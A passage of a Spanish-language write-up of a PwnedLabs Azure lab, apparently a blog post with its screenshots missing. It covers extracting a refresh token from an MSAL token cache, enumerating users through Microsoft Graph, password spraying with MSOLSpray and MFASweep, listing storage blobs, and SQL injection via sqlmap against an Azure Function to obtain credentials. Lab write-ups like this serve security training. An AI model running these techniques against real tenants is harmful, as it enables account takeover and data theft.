Una defensa ausente

Una defensa ausente


Aws PwnedLabs

Vemos el archivo csv.

ssh_command.

Despues vemos el directorio de azure y vemos los siguientes archivos.

ssh_command.

Nos concentramos en azureProfile.json

ssh_command.

Ahora vemos msal_token_cache.json

ssh_command.

ssh_command.

Podemos ver un refreshtoken.

ssh_command.

Tuve que hacer un script y correrlo para conseguir el token.

ssh_command.

ssh_command.

No me pude conectar entonces tuve que hacerlo con interfaz grafica.

ssh_command.

Import-Module ./GraphRunner.ps1

firefox GraphRunnerGui.html

ssh_command.

curl -H "Authorization: Bearer $access_token" https://graph.microsoft.com/v1.0/users | jq

ssh_command.

Vemos algunas credenciales.

ssh_command.

Import-Module ./MSOLSpray.ps1

Invoke-MSOLSpray -Userlist ./azusers.txt -Password 'REDACTED'

ssh_command.

Invoke-MFASweep -Username yuki@massive-pharma.com -Password 'REDACTED'

ssh_command.

connect-AzAccount -AccountId "yuki@massive-pharma.com"

ssh_command.

Get-AzResource

ssh_command.

No pude hacer la consulta.

ssh_command.

az login -u yuki@massive-pharma.com

ssh_command.

az storage container list --account-name mpprod --output table --auth-mode login

ssh_command.

az storage blob list --container-name portal-storage --account-name mpprod -output table --auth-mode login --query "[].name" --output table

ssh_command.

Bajamos el archivo de bash.

ssh_command.

No lo pude bajar desde el cli entonces por la pagina web se veia asi.

ssh_command.

cat users.csv

ssh_command.

cat hashes

ssh_command.

cat user.csv | grep 755...

ssh_command.

Vemos la direccion de la aplicacion.

ssh_command.

curl -X POST https://pharsight-dev.azurewebsites.net/api/HttpPharSightTrigger01 \
-d '{"trialname": "CardioPhase II"}'

ssh_command.

Recibimos el siguiente mensaje:

ssh_command.

Trate de hacer el ataque con sqlmap pero no pude:

sqlmap -r trigger.req -p "trialname" --skip-urlencode --dbs

ssh_command.

Buscamos las columnas.

ssh_command.

Hacemos una consulta con las columnas.

ssh_command.

Buscamos el nombre de la tabla.

ssh_command.

Hacemos una consulta adentro de la tabla.

ssh_command.

Encontramos las credenciales necesarias para seguir.

ssh_command.

© 2026 Cu3rv0x